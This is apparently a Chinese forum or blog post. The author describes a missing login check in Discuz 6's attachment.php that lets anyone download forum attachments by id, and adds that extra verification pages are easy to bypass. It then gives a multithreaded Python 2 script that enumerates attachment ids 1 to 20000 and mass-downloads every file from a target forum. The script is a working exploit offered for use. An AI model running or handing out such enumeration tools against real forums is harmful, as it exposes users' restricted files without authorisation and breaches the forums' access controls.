前段时间我下了个python脚本把emsky的附件全部下载了,起因是偶然发现emsky的附件不登录也能访问,直接访问一个url就行了。
后来发现大部分discuz6的论坛都有这个bug,我想是因为discuz6的attachment.php没有检测用户是否登录。
所以,要下载一个附件,这样就行了:
【论坛url】+/attachment.php?aid=+【附件id】
当然还有一些论坛可能有点验证机制,比如附件下载页面还要再点一个url,但一般这样的url都是明文的,所以也不难。
顺便再丢一个通用的很挫的python脚本:
# -*- coding: gbk -*-
# Python 2 script: bulk-download forum attachments by walking attachment ids.
import urllib
import urllib2
import cookielib
import os, time
import re
import thread
from os.path import basename
from urlparse import urlsplit

# Forum home page URL, without a trailing slash. The value was missing in the
# published script, so it is left empty here and MUST be filled in before
# running (e.g. "http://forum.example.com/bbs").
URL_INDEX = ""
DIRNAME = "attdir"  # download directory
ID_START = 1  # first attachment id to fetch
ID_END = 20000  # last attachment id to fetch (inclusive)
# Number of files stored per sub-directory. NOTE(review): the sub-directory
# name is built as "%05d000" elsewhere in the script, i.e. the literal "000"
# suffix only lines up with the id range when this stays at 1000.
DIR_NUM = 1000
# When True, each saved file name is prefixed with its zero-padded attachment
# id ("%08d_<name>").
AID_PLUS_FN = True
import threading  # imported here because only this section needs it

# Attachment URL prefix; the numeric attachment id is appended to it.
URLATT = URL_INDEX + "/attachment.php?aid="
THREAD_NUM = 10  # number of concurrent download workers

id_i = ID_START  # next attachment id to hand out; shared by every worker
_id_lock = threading.Lock()  # guards reads/updates of id_i
# Absolute download root. Absolute paths are used everywhere instead of
# os.chdir(), because the working directory is process-wide and would be
# changed underneath other worker threads.
workdir = os.path.abspath(DIRNAME)


def _ensure_dir(path):
    """Create *path* (and missing parents), tolerating a concurrent creator."""
    if os.path.isdir(path):
        return
    try:
        os.makedirs(path)
    except OSError:
        # Another worker may have created it between the check and the call;
        # only propagate when the directory really does not exist.
        if not os.path.isdir(path):
            raise


def _attachment_name(r, url):
    """Return a safe file name for response *r*, or "" when none is offered.

    The name comes from the Content-Disposition header when that header is
    present, otherwise from the path of the final URL if the request was
    redirected away from *url*.
    """
    name = ""
    disposition = r.info().get('Content-Disposition')
    if disposition is not None:
        pieces = disposition.split('filename=')
        if len(pieces) > 1:
            name = pieces[1].replace('"', '').replace("'", "")
    elif r.url != url:
        name = urlsplit(r.url)[2]
    # The name is supplied by the remote server: keep only the last path
    # component so it cannot point outside the download directory.
    name = basename(name.replace("\\", "/")).strip()
    if name in (".", ".."):
        return ""
    return name


def download(aid=0):
    """Fetch attachment *aid* and store it under the download root.

    The file goes into the sub-directory "%05d000" % (aid // DIR_NUM) and is
    prefixed with the zero-padded id when AID_PLUS_FN is true. Nothing is
    written when the server offers no file name or the target file already
    exists. Any error is printed and swallowed so that one bad id does not
    stop the whole run.
    """
    try:
        url = "%s%d" % (URLATT, aid)
        r = urllib2.urlopen(url)
        try:
            fileName = _attachment_name(r, url)
            if not fileName:
                return
            if AID_PLUS_FN:
                fileName = "%08d_%s" % (aid, fileName)
            target_dir = os.path.join(workdir, "%05d000" % (aid // DIR_NUM))
            target = os.path.join(target_dir, fileName)
            if os.path.isfile(target):
                return  # already downloaded on an earlier run
            # Read the body before creating the file so that a failed
            # transfer does not leave an empty file that later runs skip.
            data = r.read()
            _ensure_dir(target_dir)
            with open(target, 'wb') as f:
                f.write(data)
        finally:
            r.close()
    except Exception as e:
        print(e)


def downloads(id_s, id_e):
    """Worker loop: download attachments until the shared counter passes *id_e*.

    *id_s* is accepted for interface compatibility but is not used; the
    starting point is the module-level counter ``id_i``. Each id is claimed
    under a lock so that no two workers fetch the same attachment and none
    is skipped.
    """
    global id_i
    while True:
        with _id_lock:
            if id_i > id_e:
                break
            aid = id_i
            id_i = id_i + 1
        download(aid)
    print("thread ok")


if __name__ == '__main__':
    if not URL_INDEX:
        raise SystemExit("URL_INDEX is empty: set it to the forum home page URL")
    _ensure_dir(workdir)
    print("start:%d\nend:%d\n" % (ID_START, ID_END))
    workers = []
    for _ in range(THREAD_NUM):
        t = threading.Thread(target=downloads, args=(ID_START, ID_END))
        t.daemon = True  # do not keep the process alive after Ctrl-C
        t.start()
        workers.append(t)
    # Wait for the workers instead of spinning in a busy loop; the short
    # join timeout keeps the main thread responsive to KeyboardInterrupt.
    for t in workers:
        while t.is_alive():
            t.join(0.5)